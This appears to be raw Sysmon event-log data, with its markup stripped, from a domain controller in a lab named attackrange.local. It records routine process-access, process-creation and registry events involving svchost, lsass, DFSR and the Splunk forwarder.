13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-92ED-6005-C804-00000000A301}864C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92ED-6005-C804-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-92ED-6005-C804-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:57.126{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:57.126{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:57.126{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:58.861{59A5CD1D-8E46-6005-1600-00000000A301}15444448C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:58.861{59A5CD1D-8E46-6005-1600-00000000A301}15444448C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000009248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000009247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00127603) 13241300x80000000000000009246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed98-0xfd867ae5) 
13241300x80000000000000009245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda1-0x5f4ae2e5) 13241300x80000000000000009244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda9-0xc10f4ae5) 13241300x80000000000000009243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000009242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00127603) 13241300x80000000000000009241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed98-0xfd867ae5) 13241300x80000000000000009240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda1-0x5f4ae2e5) 13241300x80000000000000009239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda9-0xc10f4ae5) 13241300x80000000000000009251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:30.594{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x80000000000000009250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:30.594{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x80000000000000009249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:30.594{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 10341000x80000000000000009270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:39.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:39.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.859{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 
10341000x80000000000000009266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
